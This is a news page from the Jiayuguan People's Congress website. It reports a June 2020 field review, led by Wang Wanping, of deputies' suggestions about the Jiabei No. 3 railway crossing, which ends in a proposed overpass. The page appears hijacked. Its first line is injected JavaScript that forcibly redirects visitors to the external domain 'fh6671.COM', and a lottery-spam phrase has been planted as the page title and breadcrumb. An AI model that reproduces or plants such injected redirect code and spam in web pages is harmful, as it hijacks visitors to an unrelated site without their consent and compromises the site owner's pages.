function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  建议办理  
王万平调研市人大代表提出的部分意见建议办理情况
来源: 嘉峪关电视台      日期: 2020-06-24      作者: 文延      点击数:

王万平调研市人大代表提出的部分意见建议办理情况

       6月24日,市人大常委会副主任王万平带领部分市人大代表,就市十届人大六次会议代表提出的意见建议第58号、59号进行现场调研,并召开承办单位和提建议代表面对面办理座谈会。

       座谈会上,听取了酒钢公司、市工业园区办、市住建局、市交通局关于嘉北三号铁路道口影响嘉北工业园区工作人员上下班及车辆通行问题的解决方案及其意见建议,与会人大代表作了发言并提出了意见建议。

       王万平说,按照酒钢公司运输部目前对过往车辆和行人流量的统计,根据《中华人民共和国铁路法》的有关规定,在新华北路嘉北三号道口建立立体交叉道路非常必要,具有很强的现实意义。希望住建和发改等有关部门要加强调研和论证,建议将改造计划列入十四五规划,待条件允许的情况下进行改造,并作好人大代表意见建议办理情况答复。